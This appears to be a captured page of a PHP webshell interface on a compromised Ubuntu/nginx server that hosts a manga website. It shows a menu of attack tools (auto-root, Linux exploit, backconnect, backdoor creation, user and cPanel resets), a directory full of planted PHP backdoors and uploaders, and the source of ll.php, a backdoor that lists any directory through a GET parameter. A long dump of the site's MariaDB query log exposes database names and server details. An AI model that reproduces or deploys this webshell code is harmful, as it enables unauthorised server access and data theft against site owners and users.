Linux ubuntu 6.8.0-90-generic #91-Ubuntu SMP PREEMPT_DYNAMIC Tue Nov 18 14:14:30 UTC 2025 x86_64
nginx/1.24.0
: 67.217.245.49 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
8.3.6
www-data
Bypass.pw
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
Backdoor Scanner
Backdoor Create
Alfa Webshell
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mangaberri /
public_html /
ads /
[ HOME SHELL ]
Name
Size
Permission
Action
berripix
[ DIR ]
drwxrwxrwx
funpax
[ DIR ]
drwxrwxrwx
.ads.php
3.61
KB
-rw-r--r--
.htaccess
5
MB
-rw-rw----
copier.php
164
B
-rw-r--r--
copy2.php
231
B
-rw-r--r--
edit.php
311
B
-rw-r--r--
edit1.php
584
B
-rw-r--r--
edit2.php
381
B
-rw-r--r--
editor.php
104
B
-rw-r--r--
editor2.php
119
B
-rw-r--r--
fm.php
891
B
-rw-r--r--
htaccess.txt
46
B
-rw-r--r--
ip.php
89
B
-rw-r--r--
l1.php
304
B
-rw-r--r--
ll.php
5.73
MB
-rw-r--r--
lll.php
207
B
-rw-r--r--
ls_up.php
80
B
-rw-r--r--
mover.php
167
B
-rw-r--r--
outputter.php
31
B
-rw-r--r--
owner.php
519
B
-rw-r--r--
ownerr.php
381
B
-rw-r--r--
ownerк.php
381
B
-rw-r--r--
pwnkit
0
B
-rw-r--r--
read.php
154
B
-rw-r--r--
req1.php
31
B
-rw-r--r--
req2.php
207
B
-rw-r--r--
robots.txt
1.35
MB
-rw-rw----
scan.php
569
B
-rw-r--r--
shek.php
8.8
MB
-rw-rw----
shell.jpg
8.64
GB
-rw-rw----
shell.php
25
B
-rw-r--r--
shell.txt
30
B
-rw-r--r--
u.php
209
B
-rw-r--r--
up.php
289
B
-rw-r--r--
up2root.php
227
B
-rw-r--r--
uploader.php
355
B
-rw-r--r--
write.php
77
B
-rw-r--r--
writer.php
200
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ll.php
<?php if(isset($_GET['cmd'])) { echo '<pre>'; print_r(scandir($_GET['cmd'])); echo '</pre>'; } ?> /usr/sbin/mariadbd, Version: 10.11.13-MariaDB-0ubuntu0.24.04.1 (Ubuntu 24.04). started with: Tcp port: 4406 Unix socket: /run/mysqld/mysqld.sock Time Id Command Argument 260225 19:27:55 330637710 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637711 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637710 Quit 330637711 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.active = 1 AND REGEXP_REPLACE(REPLACE(LOWER(m.title), ' ', '-'), '[^a-z0-9-]', '') = 'jujutsu-kaisen-jjk-manga-online' 330637711 Quit 330637712 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637712 Query select * FROM chapters where manga_id = '22' order by display_priority ASC, id desc 330637712 Quit 330637713 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637713 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330637713 Quit 330637714 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637714 Query select m.*, (select name from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter, (select id from chapters where manga_id = m.id order by id desc limit 1) as latest_chapter_id FROM mangas as m where m.id !='22' and m.active = 1 AND (genres like '%Action%' OR genres like '%Demons%' OR genres like '%Drama%' OR genres like '%Magic%' OR genres like '%Martial Arts%' OR genres like '%School%' OR genres like '%Shounen%' OR genres like '%Super Power%' OR genres like '%Supernatural%') ORDER BY RAND() limit 10 330637714 Quit 330637715 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637715 Query select * FROM comments where manga_id = '22' and parent_id is null order by created desc 330637715 Quit 330637716 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637716 Query select m.*, sum(c.view) as chapter_view from mangas as m join chapters as c on (c.manga_id = m.id) where m.id = '22' and m.active = 1 330637716 Quit 330637717 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637717 Query SELECT sum(view) as total_view, m.* FROM chapters as c join mangas as m on (m.id = c.manga_id) AND (m.genres like '%Action%' OR m.genres like '%Demons%' OR m.genres like '%Drama%' OR m.genres like '%Magic%' OR m.genres like '%Martial Arts%' OR m.genres like '%School%' OR m.genres like '%Shounen%' OR m.genres like '%Super Power%' OR m.genres like '%Supernatural%') where m.active = 1 group by manga_id ORDER BY sum(view) DESC 330637717 Quit 330637718 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637719 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637718 Quit 330637719 Query select * from ( SELECT g.name, ( SELECT COUNT(m.id) FROM mangas AS m WHERE m.genres LIKE CONCAT('%', g.name, '%') and m.active = 1 ) AS total FROM genres AS g) as k where k.total > 0 order by name 330637719 Quit 330637720 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637720 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330637720 Quit 330637721 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637721 Query select * FROM chapters where manga_id = '22' order by created desc limit 1 330637721 Quit 330637722 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637722 Query select * FROM comments where parent_id = '4585' 330637722 Quit 330637723 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637723 Query select * FROM comments where parent_id = '4576' 330637723 Quit 330637724 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637724 Query select * FROM comments where parent_id = '4574' 330637724 Quit 330637725 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637725 Query select * FROM comments where parent_id = '4365' 330637725 Quit 330637726 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637726 Query select * FROM comments where parent_id = '4357' 330637726 Quit 330637727 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637727 Query select * FROM comments where parent_id = '4210' 330637727 Quit 330637728 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637728 Query select * FROM comments where parent_id = '3999' 330637728 Quit 330637729 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637729 Query select * FROM comments where parent_id = '3984' 330637729 Quit 330637730 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637730 Query select * FROM comments where parent_id = '3745' 330637730 Quit 330637731 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637731 Query select * FROM comments where parent_id = '3616' 330637731 Quit 330637732 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637732 Query select * FROM comments where parent_id = '3489' 330637732 Quit 330637733 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637733 Query select * FROM comments where parent_id = '2944' 330637733 Quit 330637734 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637734 Query select * FROM comments where parent_id = '2918' 330637734 Quit 330637735 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637735 Query select * FROM comments where parent_id = '2917' 330637735 Quit 330637736 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637736 Query select * FROM comments where parent_id = '2880' 330637736 Quit 330637737 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637737 Query select * FROM comments where parent_id = '2879' 330637737 Quit 330637738 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637738 Query select * FROM comments where parent_id = '2878' 330637738 Quit 330637739 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637739 Query select * FROM comments where parent_id = '2850' 330637739 Quit 330637740 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637740 Query select * FROM comments where parent_id = '2724' 330637740 Quit 330637741 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637741 Query select * FROM comments where parent_id = '2566' 330637741 Quit 330637742 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637742 Query select * FROM comments where parent_id = '2556' 330637742 Quit 330637743 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637743 Query select * FROM comments where parent_id = '2468' 330637743 Quit 330637744 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637744 Query select * FROM comments where parent_id = '2467' 330637744 Quit 330637745 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637745 Query select * FROM comments where parent_id = '2465' 330637745 Quit 330637746 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637746 Query select * FROM comments where parent_id = '2466' 330637746 Quit 330637747 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637747 Query select * FROM comments where parent_id = '2435' 330637747 Quit 330637748 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637748 Query select * FROM comments where parent_id = '2299' 330637748 Quit 330637749 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637749 Query select * FROM comments where parent_id = '2298' 330637749 Quit 330637750 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637750 Query select * FROM comments where parent_id = '1661' 330637750 Quit 330637751 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637751 Query select * FROM comments where parent_id = '1594' 330637751 Quit 330637752 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637752 Query select * FROM comments where parent_id = '1535' 330637752 Quit 330637753 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637753 Query select * FROM comments where parent_id = '1534' 330637753 Quit 330637754 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637754 Query select * FROM comments where parent_id = '1457' 330637754 Quit 330637755 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637755 Query select * FROM comments where parent_id = '1376' 330637755 Quit 330637756 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637756 Query select * FROM comments where parent_id = '1356' 330637756 Quit 330637757 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637757 Query select * FROM comments where parent_id = '1344' 330637757 Quit 330637758 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637758 Query select * FROM comments where parent_id = '1333' 330637758 Quit 330637759 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637759 Query select * FROM comments where parent_id = '1325' 330637759 Quit 330637760 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637760 Query select * FROM comments where parent_id = '1303' 330637760 Quit 330637761 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637761 Query select * FROM comments where parent_id = '1209' 330637761 Quit 330637762 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637762 Query select * FROM comments where parent_id = '1208' 330637762 Quit 330637763 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637763 Query select * FROM comments where parent_id = '962' 330637763 Quit 330637764 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637764 Query select * FROM comments where parent_id = '959' 330637764 Quit 330637765 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637765 Query select * FROM comments where parent_id = '896' 330637765 Quit 330637766 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637766 Query select * FROM comments where parent_id = '895' 330637766 Quit 330637767 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637767 Query select * FROM comments where parent_id = '851' 330637767 Quit 330637768 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637768 Query select * FROM comments where parent_id = '844' 330637768 Quit 330637769 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637769 Query select * FROM comments where parent_id = '809' 330637769 Quit 330637770 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637770 Query select * FROM comments where parent_id = '800' 330637770 Quit 330637771 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637771 Query select * FROM comments where parent_id = '779' 330637771 Quit 330637772 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637772 Query select * FROM comments where parent_id = '777' 330637772 Quit 330637773 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637773 Query select * FROM comments where parent_id = '743' 330637773 Quit 330637774 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637774 Query select * FROM comments where parent_id = '742' 330637774 Quit 330637775 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637775 Query select * FROM comments where parent_id = '735' 330637775 Quit 330637776 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637776 Query select * FROM comments where parent_id = '730' 330637776 Quit 330637777 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637777 Query select * FROM comments where parent_id = '728' 330637777 Quit 330637778 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637778 Query select * FROM comments where parent_id = '727' 330637778 Quit 330637779 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637779 Query select * FROM comments where parent_id = '725' 330637779 Quit 330637780 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637780 Query select * FROM comments where parent_id = '721' 330637780 Quit 330637781 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637781 Query select * FROM comments where parent_id = '719' 330637781 Quit 330637782 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637782 Query select * FROM comments where parent_id = '720' 330637782 Quit 330637783 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637783 Query select * FROM comments where parent_id = '717' 330637783 Quit 330637784 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637784 Query select * FROM comments where parent_id = '718' 330637784 Quit 330637785 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637785 Query select * FROM comments where parent_id = '715' 330637785 Quit 330637786 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637786 Query select * FROM comments where parent_id = '703' 330637786 Quit 330637787 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637787 Query select * FROM comments where parent_id = '702' 330637787 Quit 330637788 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637788 Query select * FROM comments where parent_id = '696' 330637788 Quit 330637789 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637789 Query select * FROM comments where parent_id = '694' 330637789 Quit 330637790 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637790 Query select * FROM comments where parent_id = '689' 330637790 Quit 330637791 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637791 Query select * FROM comments where parent_id = '687' 330637791 Quit 330637792 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637792 Query select * FROM comments where parent_id = '683' 330637792 Quit 330637793 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637793 Query select * FROM comments where parent_id = '672' 330637793 Quit 330637794 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637794 Query select * FROM comments where parent_id = '660' 330637794 Quit 330637795 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637795 Query select * FROM comments where parent_id = '659' 330637795 Quit 330637796 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637796 Query select * FROM comments where parent_id = '657' 330637796 Quit 330637797 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637797 Query select * FROM comments where parent_id = '656' 330637797 Quit 330637798 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637798 Query select * FROM comments where parent_id = '87' 330637798 Quit 330637799 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637799 Query select * FROM comments where parent_id = '81' 330637799 Quit 330637800 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637800 Query select * FROM comments where parent_id = '77' 330637800 Quit 330637801 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637801 Query select * FROM comments where parent_id = '22' 330637801 Quit 330637802 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637802 Query select * FROM comments where parent_id = '21' 330637802 Quit 330637803 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637803 Query select * FROM comments where parent_id = '12' 330637803 Quit 330637804 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637804 Query select * FROM comments where parent_id = '11' 330637804 Quit 330637805 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637805 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '124' order by created desc 330637805 Quit 330637806 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637806 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330637806 Quit 330637807 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637807 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '136' order by created desc 330637807 Quit 330637808 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637808 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '35' order by created desc 330637808 Quit 330637809 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637809 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '59' order by created desc 330637809 Quit 330637810 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637810 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '22' order by created desc 330637810 Quit 330637811 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637811 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '141' order by created desc 330637811 Quit 330637812 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637812 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330637812 Quit 330637813 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637813 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330637813 Quit 330637814 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637814 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330637814 Quit 330637815 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637815 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '104' order by created desc 330637815 Quit 330637816 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637816 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '96' order by created desc 330637816 Quit 330637817 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637817 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '38' order by created desc 330637817 Quit 330637818 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637818 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '157' order by created desc 330637818 Quit 330637819 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637819 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330637819 Quit 330637820 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637820 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '99' order by created desc 330637820 Quit 330637821 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637821 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330637821 Quit 330637822 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637822 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '137' order by created desc 330637822 Quit 330637823 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637823 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '98' order by created desc 330637823 Quit 330637824 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637824 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '27' order by created desc 330637824 Quit 330637825 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637825 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '175' order by created desc 330637825 Quit 330637826 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637826 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '150' order by created desc 330637826 Quit 330637827 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637827 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '110' order by created desc 330637827 Quit 330637828 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637828 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330637828 Quit 330637829 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637829 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '25' order by created desc 330637829 Quit 330637830 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637830 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '149' order by created desc 330637830 Quit 330637831 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637831 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '135' order by created desc 330637831 Quit 330637832 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637832 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '49' order by created desc 330637832 Quit 330637833 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637833 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '97' order by created desc 330637833 Quit 330637834 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637834 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '163' order by created desc 330637834 Quit 330637835 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637835 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330637835 Quit 330637836 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637836 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330637836 Quit 330637837 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637837 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '108' order by created desc 330637837 Quit 330637838 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637838 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '26' order by created desc 330637838 Quit 330637839 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637839 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '131' order by created desc 330637839 Quit 330637840 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637840 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330637840 Quit 330637841 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637841 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '48' order by created desc 330637841 Quit 330637842 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637842 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '158' order by created desc 330637842 Quit 330637843 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637843 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '152' order by created desc 330637843 Quit 330637844 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637844 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '166' order by created desc 330637844 Quit 330637845 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637845 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330637845 Quit 330637846 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637846 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '113' order by created desc 330637846 Quit 330637847 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637847 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '61' order by created desc 330637847 Quit 330637848 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637848 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '132' order by created desc 330637848 Quit 330637849 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637849 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '160' order by created desc 330637849 Quit 330637850 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637850 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '80' order by created desc 330637850 Quit 330637851 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637851 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '102' order by created desc 330637851 Quit 330637852 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637852 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '142' order by created desc 330637852 Quit 330637853 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637853 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '140' order by created desc 330637853 Quit 330637854 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637854 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '111' order by created desc 330637854 Quit 330637855 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637855 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330637855 Quit 330637856 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637856 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '169' order by created desc 330637856 Quit 330637857 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637857 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '55' order by created desc 330637857 Quit 330637858 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637858 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '133' order by created desc 330637858 Quit 330637859 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637859 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330637859 Quit 330637860 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637860 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '95' order by created desc 330637860 Quit 330637861 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637861 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '85' order by created desc 330637861 Quit 330637862 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637862 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330637862 Quit 330637863 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637863 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330637863 Quit 330637864 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637864 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '106' order by created desc 330637864 Quit 330637865 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637865 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '151' order by created desc 330637865 Quit 330637866 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637866 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '128' order by created desc 330637866 Quit 330637867 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637867 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '146' order by created desc 330637867 Quit 330637868 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637868 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '170' order by created desc 330637868 Quit 330637869 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637869 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '138' order by created desc 330637869 Quit 330637870 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637870 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330637870 Quit 330637871 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637871 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '159' order by created desc 330637871 Quit 330637872 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637872 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330637872 Quit 330637873 Connect mangauser@localhost on u317079482_mangaberri_1 using Socket 330637873 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '121' order by created desc 330637873 Quit 330637874 Connect mangauser@localhost on u317079482_mangaberri_1 